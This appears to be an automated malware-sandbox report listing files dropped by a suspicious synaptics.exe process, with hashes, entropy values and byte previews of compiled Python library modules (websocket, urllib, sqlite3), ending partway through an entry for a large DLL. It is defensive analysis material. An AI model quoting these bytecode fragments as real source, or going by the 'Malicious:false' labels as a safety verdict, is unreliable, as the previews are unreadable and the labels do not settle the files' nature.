                                                                                                                                                                                      Preview:o.........f.2.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...g.d...Z.z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.Z.W.n.......d.Z.G.d.d...d.e ..Z!G.d.d...d.e ..Z"G.d.d...d.e ..Z#Y.G.d.d...d...Z$d.e%d.e&f.d.d...Z'd.e%f.d.d...Z(d.e)d.e*d.e&f.d d!..Z+d"d#..Z,d$e.j.d%e-f.d&d'..Z.d$e.j.d(e-f.d)d*..Z/d$e.j.d.e)d.e.j.f.d+d,..Z0d$e.j.d.e&f.d-d...Z1d.S.)/a_...._http.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specifi
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2429
                                                                                                                                                                                      Entropy (8bit):4.742769130722236
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:93spkf0YgURvDMDzDf+h3X0V3fFxksmtOX5uPJPZXrnquoGgBED:92i0Yg803W3X0VvqtOX5uPJBloGgB4
                                                                                                                                                                                      MD5:01AEED6E6CD548FF5EAE4AD7071933FD
                                                                                                                                                                                      SHA1:67D7D3C0A7C92E39F9402EE2936A9E7C3A8C3F3B
                                                                                                                                                                                      SHA-256:C615AB11870F9324CD37D33BD1F4D08D673C835FD5AC844861D2FE2937D6AA3F
                                                                                                                                                                                      SHA-512:AD32701A38C6FDCD1880C695B68D9278B4A0CE565A695D00FD371ECDCCC956A5DC8517BF6163C59237D1BDB58F3101F3B6BCA01D4BAF04E73C5C5B260D0EDD66
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s&...d.d.l.Z...e...d...Z.z.d.d.l.m.Z...W.n...e.y$......G.d.d...d.e.j...Z.Y.n.w.e...e.......d.a.g.d...Z.e.....d.f.d.e.d.e.j.d.e.d.d.f.d.d...Z.d.e.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.d.d.f.d.d...Z.d.e.f.d.d...Z.d.e.f.d d!..Z.d.e.f.d"d#..Z.d.S.)$.....N..websocket)...NullHandlerc....................@...s....e.Z.d.Z.d.d.d...Z.d.S.).r......returnNc....................C...s....d.S...N..)...self..recordr....r.....DC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_logging.py..emit...........z.NullHandler.emit).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r........s........r....F)...enableTrace..dump..error..warning..debug..trace..isEnabledForError..isEnabledForDebug..isEnabledForTrace..DEBUG..traceable..handler..levelr....c....................C...s*...|.a.|.r.t...|.....t...t.t.|.......d.S.d.S.).z.. Turn on/off the traceability... Parameters. ----------.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4051
                                                                                                                                                                                      Entropy (8bit):5.416582834388625
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:JJkFTFnpUXHQ9VTyHLDPEoFgTHX+S6VAqcm1MlMfs:JyhnmXoTUsoUuSE11IMfs
                                                                                                                                                                                      MD5:0F40BBC4ABF7B82C0F89D9BEC7C67E98
                                                                                                                                                                                      SHA1:FDE5942299FF94C32F4FCB18B000578374553C26
                                                                                                                                                                                      SHA-256:86CC577D5193C131FD5C8555DE8D8FC0330FC02CE198D24FFAFEFA839FBA70E5
                                                                                                                                                                                      SHA-512:08220A36FE987ED0C94F1C5AA6142DF02DB49C25073952931D771E332DA14787CF397F8FB741F02EA5AE809CA8C1784D5C53F88D56B48B7DA642CDDEAD65B276
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........fN........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.....e.j.e.j.d.f.g.Z.e.e.d...rDe...e.j.e.j.d.f.....e.e.d...rSe...e.j.e.j.d.f.....e.e.d...rbe...e.j.e.j.d.f.....e.e.d...rqe...e.j.e.j.d.f.....d.a.g.d...Z.G.d.d...d...Z.d.e.e.e.d.f...d.d.f.d.d...Z.d.e.e.e.d.f...f.d.d...Z.d.e.j.d.e.d.e f.d.d...Z!d.e.j.d.e f.d.d...Z"d.e.j.d.e.e e#f...d.e.f.d.d...Z$d.S.) .....N)...Union.....).."WebSocketConnectionClosedException..WebSocketTimeoutException)...SSLError..SSLWantReadError..SSLWantWriteError)...extract_error_code..extract_err_message..SO_KEEPALIVE..TCP_KEEPIDLE.......TCP_KEEPINTVL.......TCP_KEEPCNT.....)...DEFAULT_SOCKET_OPTION..sock_opt..setdefaulttimeout..getdefaulttimeout..recv..recv_line..sendc....................@...s"...e.Z.d.Z.d.e.d.e.d.d.f.d.d...Z.d.S.).r......sockopt..sslopt..returnNc....................C...s....|.d.u.r.g.}.|.d.u.r.i.}.|.|._.|.|._.d.|._.d.S...N).r....r......timeout)...selfr....r......r.....C
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1504
                                                                                                                                                                                      Entropy (8bit):5.231969165830796
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:YiToV7RkwGW7mTzhZl4IpheU0E+4HQk1Gps2B5OBD8TONq5HJu2OeuxHb:D07aLUI4+h0CH31KN0BQTvVfyb
                                                                                                                                                                                      MD5:CB57598270B045478A23D723F0C08925
                                                                                                                                                                                      SHA1:835D0F20FF959D957B2D894B963C3B5674628D3F
                                                                                                                                                                                      SHA-256:80E5909A29883D437F293845472EFAA9D489900C12CABDA0BC3E073F325DC8E0
                                                                                                                                                                                      SHA-512:893CF1E7594C64BAF838EA0285D6D215A1BD197E3E6006AD4BC1C9A2F390D3CAB9CB591FA3E4088F155FD7D5C9C0205DFA3938EBBD9323812EF8EB10AF338D50
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s....d.Z.g.d...Z.z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.Z.W.d.S...e.yI......G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.Z.d.Z.Y.d.S.w.).ae...._ssl_compat.py.websocket - WebSocket client library for Python..Copyright 2024 engn33r..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License..)...HAVE_SSL..ssl..SSLError..SSLEOFError..SSLWantReadError..SSLWantWriteError.....N).r....r....r....r....Tc....................@........e.Z.d.Z.d.S.).r....N....__name__..__module__..__qu
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4367
                                                                                                                                                                                      Entropy (8bit):5.500850419682739
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:klQBQRosjToIzsNAuT/ceAxr6UYtSwGJBBK9WFSuGZDgQ:TBQRRXBIkB2UYPQkqGZ
                                                                                                                                                                                      MD5:7005371AE2BB78841891EF92AB5E5752
                                                                                                                                                                                      SHA1:167AAE6084F3987B8169FC29ECDF68F1F837A210
                                                                                                                                                                                      SHA-256:A9EA089C77E4596310E77FA9E4B403D0FAEACFDD92DEF0E551506336C7755243
                                                                                                                                                                                      SHA-512:7D1ADF82D23A96AF34FCCF47D1CA9A64A0BEDA9CB2DA947EBC5A67D8AD5AD2F06FE38C5A2EA510FD43822815543A9672C836820563C9869D40F9E410883DA2B2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....d.d.g.Z.d.e.d.e.f.d.d...Z.d.d.g.Z.d.e.d.e.f.d.d...Z.d.e.d.e.f.d.d...Z.d.e.d.e.d.e.f.d.d...Z.d.e.d.e.e...d.e.f.d.d...Z...........d!d.e.d.e.d.e.e...d.e.d.e.e...d.e.e...d.e.d.e.f.d d...Z.d.S.)".....N)...Optional)...unquote..urlparse.....)...WebSocketProxyException..parse_url..get_proxy_info..url..returnc....................C...s....d.|.v.r.t.d.....|...d.d...\.}.}.t.|.d.d...}.|.j.r.|.j.}.n.t.d.....d.}.|.j.r)|.j.}.d.}.|.d.k.r4|.s3d.}.n.|.d.k.r?d.}.|.s>d.}.n.t.d.|.......|.j.rL|.j.}.n.d.}.|.j.rY|.d.|.j.....7.}.|.|.|.|.f.S.).z.. parse url and the result is tuple of. (hostname, port, resource path and the flag of secure mode).. Parameters. ----------. url: str. url string.. ..:z.url is invalidr......http)...schemez.hostname is invalidr....F..ws.P.....wssTi....z.scheme %s is invalid../..?)...ValueError..splitr......hostname..port..path..query).r....r......parse
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4085
                                                                                                                                                                                      Entropy (8bit):4.077867033704649
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:3xFBpqD0ey3vxQkJxriXOTwJSPe1IHcO6GA9PYR:3xFBpo0ey+k/rUOTOSP+IP6GnR
                                                                                                                                                                                      MD5:F426432B1343D6B49993DEC627231894
                                                                                                                                                                                      SHA1:3E521B29DB1328679565367C13D0F0A7D9A332AF
                                                                                                                                                                                      SHA-256:F37DFD47C5A47A2F78D65513DCF21F921D810F16B626FFA6D538551832D95E11
                                                                                                                                                                                      SHA-512:A14DC0A8EFFA77DDCDFCD22A01404353369156E126397077E1AF1B031807EEA92642CB5D0232C023C07987044F755A03A7FF33D2068B9E2386FC046AAD489435
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.........f1........................@...s....d.d.l.m.Z.....g.d...Z.G.d.d...d...Z.z.d.d.l.m.Z...d.e.e.e.f...d.e.f.d.d...Z.W.n+..e.yR......d.Z.d.Z.g.d...Z.d.e.d.e.d.e.d.e.f.d.d...Z.d.e.e.e.f...d.e.f.d.d...Z.Y.n.w.d.e.e.e.f...d.e.f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.e.d.e.e.d.f...f.d.d...Z.d.S.)......)...Union)...NoLock..validate_utf8..extract_err_message..extract_error_codec....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.).r......returnNc....................C........d.S...N..)...selfr....r.....BC:\Users\Public\QExvbmVOb25l\lib\site-packages\websocket\_utils.py..__enter__...........z.NoLock.__enter__c....................C...r....r....r....).r......exc_type..exc_value..tracebackr....r....r......__exit__....r....z.NoLock.__exit__).r....N)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....)...Utf8Validator..utfbytesr....c....................C...s....t.....|...d...}.|.S...Nr....).r......validate).r......resultr....r....r......_validate_u
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):512
                                                                                                                                                                                      Entropy (8bit):5.477958729644305
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/KVLlUA1pAZVsrPkf0rjyl3KZX43d4AQILXyJ4hs2onBMigt0lBBuaHxEM9Ar4t:C2RtWsrPJeMS4OjyJasv6OlBBVlVztmm
                                                                                                                                                                                      MD5:B4991AB509209AB025FF74AD75143879
                                                                                                                                                                                      SHA1:BCF6D86C1EEC4E53D323FC27FFB8494455E28084
                                                                                                                                                                                      SHA-256:0FB1177D185CEBE835F9E36BD4AF2CDB33F3E18C9124107D56AC4E0850706798
                                                                                                                                                                                      SHA-512:284C8B5E1B3A029B380315C76E430004614E3027123AE76202EAA3110EC9B8C5445431E2C431E34A464DC81E2B5387AAE33985DB3621E96B180AC2A96019ECDC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o.......l..f.........................@...s....z.d.d.l.Z.W.n...e.y.......Y.d.S.w.d.d.l.Z.e.j.D.]<Z.e.j...e...rTe.e.d...r-e...e.......d.S.e.j.d.....e...sQe.j.d.....e.j.e...d...e.j.d.<.e.e.j...e.j.d.....e.j.d.<...d.S.q.d.S.)......N..add_dll_directory..PATH..).Z.pywin32_system32..ImportError..os..__path__..path..isdir..hasattrr......environ..startswith..replace..pathsep..r....r.....MC:\Users\Public\QExvbmVOb25l\lib\site-packages\win32\lib\pywin32_bootstrap.py..<module>....s".....................................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1659
                                                                                                                                                                                      Entropy (8bit):5.251597495375789
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:N2TWmbT1esm0TcObLNuETO6jG+Qv6Mqm0:N2TWmle8QNETO5zPq1
                                                                                                                                                                                      MD5:E4B3FAA2BB6EBD69E4CD5D9DB6677FDE
                                                                                                                                                                                      SHA1:5FED9B363EE69451682AC19772E62B191B722741
                                                                                                                                                                                      SHA-256:4A698067EEC867C55A8B9E6B3C412370D2689CB0D610089B27CDF64DB70400A5
                                                                                                                                                                                      SHA-512:29C3167532CE47A25EF2064B2FE2CBADEE2D58E4EE822D0E13EFEE79B0D401E3EBB80BC885316A7DB83CE21A73C21C34A8B5A1353966CAC57A68B11A92B025FD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d/........................@...s....d.Z.d.d.l.T.d.d...Z.d.S.).u.....The sqlite3 extension module provides a DB-API 2.0 (PEP 249) compliant.interface to the SQLite library, and requires SQLite 3.7.15 or newer...To use the module, start by creating a database Connection object:.. import sqlite3. cx = sqlite3.connect("test.db") # test.db will be created or opened..The special path name ":memory:" can be provided to connect to a transient.in-memory database:.. cx = sqlite3.connect(":memory:") # connect to a database in RAM..Once a connection has been established, create a Cursor object and call.its execute() method to perform SQL queries:.. cu = cx.cursor().. # create a table. cu.execute("create table lang(name, first_appeared)").. # insert values into a table. cu.execute("insert into lang values (?, ?)", ("C", 1972)).. # execute a query and iterate over the result. for row in cu.execute("select * from lang"):. print(row).. cx.close()..Th
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2987
                                                                                                                                                                                      Entropy (8bit):5.130993463150614
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:b2fEkeTde1heBB/KP+7oheXYPX7sV2PXSedPuPXRGqPz0DOPXuPXDFePXd/UTb2a:qf8TdqhgB/6+7oheXYv7sV2vSeRuvRFg
                                                                                                                                                                                      MD5:96066D9EA4730FB8A52B9341CDD862A3
                                                                                                                                                                                      SHA1:566D9F02596B94C2CAA4FE07FECCADF6F8F8DF11
                                                                                                                                                                                      SHA-256:70B1E101D7919A2CA10B83AC079F4AB8631F594E99AE217042D739C7099C4FAB
                                                                                                                                                                                      SHA-512:A07F00D0B9BD689E93BE77BB0F32CFE4409D1AFE1977F0F2BE82CF08CC302CE6735BB6F06DF3CED43189963BD7D086114352F8348B254EA1EE1847C780C45359
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-db........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.Z.d.Z.d.Z.e.j.Z.e.j.Z.e.j.Z.d.d...Z.d.d...Z.d.d...Z.e.d.d...e...d...D.....Z.e.d.d...e...d...D.....Z.e.Z.e.j.j...e.....d.d...Z.e.....d.d...Z.[.d.S.)......N)...*Z.qmark.....z.2.0c....................C........t.t...|...d.d.......S.).N.....)...Date..time..localtime..Z.ticks..r.....2C:\Users\Public\QExvbmVOb25l\lib\sqlite3\dbapi2.py..DateFromTicks)..........r....c....................C...s....t.t...|...d.d.......S.).Nr.........)...Timer....r....r....r....r....r......TimeFromTicks,...r....r....c....................C...r....).Nr....)...Timestampr....r....r....r....r....r......TimestampFromTicks/...r....r....c....................C........g.|.].}.t.|.....q.S.r........int.....0..xr....r....r......<listcomp>2..........r.......c....................C...r....r....r....r....r....r....r....r....3...r....c....................C...sP...d.d...}.d.d...}.d.d...}.d.d...}.t.t.j.|.....t.t.j.|.....t.d.|.....t.d.|.....d.S.).Nc........
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):144
                                                                                                                                                                                      Entropy (8bit):4.299849398775959
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3:y/1LRylluleh/wZWehfZAuaHF50YTlHX0MpZqOkcTgp:y/7y/qeh/wtZAuaHxEMpAu4
                                                                                                                                                                                      MD5:96A4247C7C550E01FAD857C253745343
                                                                                                                                                                                      SHA1:382EC3835609FB20B31C5C2770A4B8DBB11056FF
                                                                                                                                                                                      SHA-256:C4F1C2565A556602352F26249D32E152464AFD07E7DF4DA091F475B6DDF9B36D
                                                                                                                                                                                      SHA-512:F299FD8664BE8F2928ABD0E91739EE54CC39422A99A752210A67E9B28203B46EB18D80193C1BEBB9BE42D2DFA9DEB2045CDACBFF2FAA9DBF801B2F11EBAF3F83
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.S.).N..r....r....r.....3C:\Users\Public\QExvbmVOb25l\lib\urllib\__init__.py..<module>....s......
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2866
                                                                                                                                                                                      Entropy (8bit):4.912166415655626
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:zSbuQshuDSkJ8eJ/8iWqgpHO26ZenDxp/mdveDI8JG/UOUPkjKbMrHoYwqmAMlna:GbuyDSkJ8eJ/8mgpHF/DxwdveDI84/Ue
                                                                                                                                                                                      MD5:95A3E7F669EBF2F50B920D0460577C00
                                                                                                                                                                                      SHA1:B99B8EBE831C681594098D6E16DE3DE13EEED033
                                                                                                                                                                                      SHA-256:FAB337194A22E802DCE30B6BD6CAE1ADF6F60DC94F593ABDFC58E355BFE1E5B8
                                                                                                                                                                                      SHA-512:972B8E1AAABA3D29B7258D9434EECE17285017D1D85223E66AC1540A6F7AFEE18233359BDB823E8E699289C52D88FDE4D06D0454AB1E685ADF808919EB9784E0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sV...d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.G.d.d...d.e...Z.G.d.d...d.e.e.j.j...Z.G.d.d...d.e...Z.d.S.).a....Exception classes raised by urllib...The base exception class is URLError, which inherits from OSError. It.doesn't define any behavior of its own, but is the base class for all.exceptions defined in this package...HTTPError is an exception class that is also a valid HTTP response.instance. It behaves this way because HTTP protocol errors are valid.responses, with a status code, headers, and a body. In some contexts,.an application may want to handle an exception like a regular.response.......N)...URLError..HTTPError..ContentTooShortErrorc....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s$...|.f.|._.|.|._.|.d.u.r.|.|._.d.S.d.S...N)...args..reason..filename)...selfr....r......r.....0C:\Users\Public\QExvbmVOb25l\lib\urllib\error.py..__init__....s..............z.URLError.__init__c....................C...s...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33789
                                                                                                                                                                                      Entropy (8bit):5.440428783184804
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:IGxTqI5qcr97to4zfJA/G4B3qrmuZv0saN7erPd:fx7FSUCd7uZv0saN7er1
                                                                                                                                                                                      MD5:0B8037B5DAC92DF05E7C905B6CE8949D
                                                                                                                                                                                      SHA1:C78BA83A890BD89000E8C25D91420322116BE363
                                                                                                                                                                                      SHA-256:1957D7ACC978C2BD9BD5073D28F5EAE6AC3B456FE2CD2B3BC1EE2F8B389F0D8D
                                                                                                                                                                                      SHA-512:E38CC3D533E80FF41252A8CEEA5AD59684760308226696E0EF018DF85CF6287AA077CF6DF359AFB2A2D72D3804DBC79B0CEBE857F05225114CDA8708950AECC5
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.g.d...Z.d.Z.g.d...Z.d.Z.i.Z.d.d...Z.d.Z.d.Z.d.d...Z.e.e.f.d.d...Z.e.e.f.d.d...Z.d.d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e.e...Z.G.d!d"..d"e.e...Z.d.d#l.m.Z...e.d$d%..Z.e.d&d'..Z e.d(d)..Z!d*e._.d+e.j"_.d,e.j#_.d-e _.d.e j$_.d/e j%_.d0e j&_.d1e j'_.d2e j#_.d3e!_.e j$j.e!j$_.e j%j.e!j%_.e j&j.e!j&_.d4e!j(_.e j'j.e!j'_.e j#j.e!j#_.e.Z)G.d5d$..d$e.e...Z*G.d6d&..d&e e...Z+G.d7d(..d(e!e...Z,G.d8d9..d9e.e...Z-G.d:d;..d;e e...Z.G.d<d=..d=e!e...Z/d>d?..Z0e0....[0d.dBdC..Z1dDdE..Z2d.dFdG..Z3dHdI..Z4d.dJdK..Z5dLdM..Z6dNdO..Z7d.dPdQ..Z8dRdS..Z9dTZ:d.a;dUdV..Z<e..=dW..Z>d.dZd[..Z?.\.]d.d^d_..Z@.\.]d.d`da..ZAd.dbdc..ZBeCdd..ZDeEeD..ZFi.ZGG.dedf..dfe.jH..ZId.dhdi..ZJd.djdk..ZKd.dldm..ZLd\d@d.d.eKf.dndo..ZMdpdq..ZNdrds..ZOdtdu..ZPdvdw..ZQd.aRdxdy..ZSdzd{..ZTd.aUd|d}..ZVd~d...ZWd.d...ZXd.d...ZYd.d...ZZd.d...Z[d.a\d.d...Z]d.d.d...Z^d.d.d...Z_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):71351
                                                                                                                                                                                      Entropy (8bit):5.432247260526459
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:6ZcvBPt5NLOapNHHroeOfudJQelc4vuMM+afOa6rFoiRhGuEWY:6WFt5UavnroRujuL6Tzp/Y
                                                                                                                                                                                      MD5:93C0B5BB7D0629EBF8B8915DFF8639C2
                                                                                                                                                                                      SHA1:A180496FA16C53B9BA984665B479DB65C6F8DC59
                                                                                                                                                                                      SHA-256:3B4A61BBCAD481B0F5E67BE6A0913ABFAD2C5FF207A6525EC194B94AC5D78331
                                                                                                                                                                                      SHA-512:6B080C24C13DD6C715643679724710D3B980EAF34107086639BD7FE50A389476C6EAC5CE0E8B14C4A85F1452CD45ED7D2C6D06A727735EB3BAFF58B3C1BC156C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%m&Z&m'Z'm(Z(..d.d.l)m*Z*m+Z+..z.d.d.l,Z,W.n...e-y.......d.Z.Y.n.w.d.Z.g.d...Z/d.e.j0d.d.......Z1d.a2d.e.j3f.d.d.d.d.d...d.d...Z4d.d...Z5g.Z6d.d.d...Z7d.d...Z8e..9d.e.j:..Z;d.d...Z<G.d.d...d...Z=G.d.d...d...Z>d.d...Z?G.d.d...d...Z@G.d.d ..d e@..ZAG.d!d"..d"e@..ZBG.d#d$..d$e@..ZCd%d&..ZDG.d'd(..d(e@..ZEG.d)d*..d*..ZFG.d+d,..d,eF..ZGG.d-d...d.eG..ZHG.d/d0..d0..ZIG.d1d2..d2eIe@..ZJG.d3d4..d4eIe@..ZKe.jLZMG.d5d6..d6..ZNG.d7d8..d8e@eN..ZOG.d9d:..d:e@eN..ZPG.d;d<..d<e@..ZQG.d=d>..d>eQ..ZReSe.jTd?....rtG.d@dA..dAeQ..ZUe/.VdA....G.dBdC..dCe@..ZWG.dDdE..dEe@..ZXdFdG..ZYdHdI..ZZG.dJdK..dKe@..Z[dLdM..Z\G.dNdO..dOe@..Z]G.dPdQ..dQe]..Z^G.dRdS..dSe@..Z_dTZ`e.jadUk...r.d.dVlbmcZcmdZd..n.dWdX..ZcdYdZ..Zdi.ZeG.d[d\..d\..ZfG.d]d^..d^ef..Zgd.ahd_
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3480
                                                                                                                                                                                      Entropy (8bit):4.7525414505217825
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:4BaL9CzkpnMvDq/vnacKhRVH+nRsxv5C+8/15dzjT:Lxunbq33ERVHNvCl/9T
                                                                                                                                                                                      MD5:8F0127A2D149521EB674B9942E5445F1
                                                                                                                                                                                      SHA1:6B059FC711C27A86429BFB15B768D6C4F660541D
                                                                                                                                                                                      SHA-256:29AF12BC7CA9ADCCC0D057A81E90F9D02F24D634A06F046532C795A4F3F8ED9B
                                                                                                                                                                                      SHA-512:1A0DB47CD5398B62FF2654F1D732525ED06518D4CD01427120B948CD934610812D3C9E32734DBFE84DAFDAEFFCF7EC6C401CCEA0A9DE4DD698919809011D4FB0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sZ...d.Z.d.d.l.Z.g.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).a....Response classes used by urllib...The base class, addbase, defines a minimal file-like interface,.including read() and readline(). The typical response object is an.addinfourl instance, which defines an info() method that returns.headers and a geturl() method that returns the url.......N)...addbase..addclosehook..addinfo..addinfourlc........................s8...e.Z.d.Z.d.Z...f.d.d...Z.d.d...Z.d.d...Z.d.d...Z.....Z.S.).r....zOBase class for addinfo and addclosehook. Is a good idea for garbage collection.c........................s ...t.t.|...j.|.d.d.d.....|.|._.d.S.).Nz.<urllib response>F)...delete)...superr......__init__..fp)...selfr........__class__...3C:\Users\Public\QExvbmVOb25l\lib\urllib\response.pyr........s........z.addbase.__init__c....................C...s....d.|.j.j.t.|...|.j.f...S.).Nz.<%s at %r whose fp = %r>).r......__name__..id..fi
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4143384
                                                                                                                                                                                      Entropy (8bit):6.719606889163802
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:49152:0izdDWQcAdLh1ckY/wqIEh8rvZGsIBGfHP2MZnaPxQ1w7OEnGI8wgJyf:0uAk3rWBcH+MZ0Q1wlnYZJY
                                                                                                                                                                                      MD5:73CADAB187AD5E06BEF954190478E3AA
